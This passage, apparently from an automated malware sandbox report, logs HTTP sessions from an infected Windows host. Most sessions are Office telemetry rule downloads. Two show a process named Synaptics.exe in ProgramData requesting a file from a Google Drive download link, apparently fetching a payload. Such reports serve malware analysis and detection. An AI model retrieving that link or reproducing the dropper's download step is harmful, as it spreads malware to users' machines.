                                                                                        2024-12-05 21:50:45 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        86192.168.2.54987213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:45 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:45 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 470
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                        x-ms-request-id: 8c60988c-801e-00a3-08c1-457cfb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215045Z-1746fd949bdfg4slhC1EWR34t0000000036g000000008s74
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:45 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        87192.168.2.54987313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:45 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:45 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:45 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                        ETag: "0x8DC582BB556A907"
                                                                                        x-ms-request-id: 1a0f4f93-001e-0049-61cb-455bd5000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215045Z-1746fd949bdhk6hphC1EWRaw3c0000000330000000009ndd
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:45 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        88192.168.2.54987913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:46 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:46 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 502
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                        x-ms-request-id: b51b559c-801e-008c-7fcc-457130000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215046Z-1746fd949bdjzh7thC1EWR3g6400000003ag00000000eykz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:46 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        89192.168.2.549882172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:47 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:47 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4kvOtwg_gyjmwhGW7-HSCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        90192.168.2.549883172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:47 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:47 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-59D4rKZxQKgW-QrRWmxr_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        91192.168.2.54988413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:47 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:47 UTC471INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                        x-ms-request-id: 7bbb8e32-501e-000a-415f-470180000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215047Z-1746fd949bd5gpk5hC1EWR8dk400000000yg000000003s4v
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_MISS
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:47 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        92192.168.2.54988513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:47 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:47 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                        x-ms-request-id: 859db5fc-901e-005b-23cb-452005000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215047Z-1746fd949bd77mkmhC1EWR5efc00000003n00000000060v8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:47 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        93192.168.2.54988613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:47 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:48 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 469
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                        x-ms-request-id: bcf9f347-101e-007a-60d2-45047e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215047Z-1746fd949bd77mkmhC1EWR5efc00000003m000000000932r
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:48 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        94192.168.2.54988713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:47 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:48 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 408
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                        x-ms-request-id: 68175a90-d01e-0065-3ed1-45b77a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215047Z-1746fd949bdxk6n6hC1EWRdr8c000000032g00000000pzcm
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:48 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        95192.168.2.54988813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:48 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:48 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:48 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 416
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                        x-ms-request-id: 2aa810bc-801e-008f-63c1-452c5d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215048Z-1746fd949bddgsvjhC1EWRum2c00000003hg00000000gfra
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:48 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        96192.168.2.54989013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:49 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:49 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                        x-ms-request-id: 26f79bf1-901e-0083-7ec4-45bb55000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215049Z-1746fd949bdfg4slhC1EWR34t0000000038g000000000he2
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
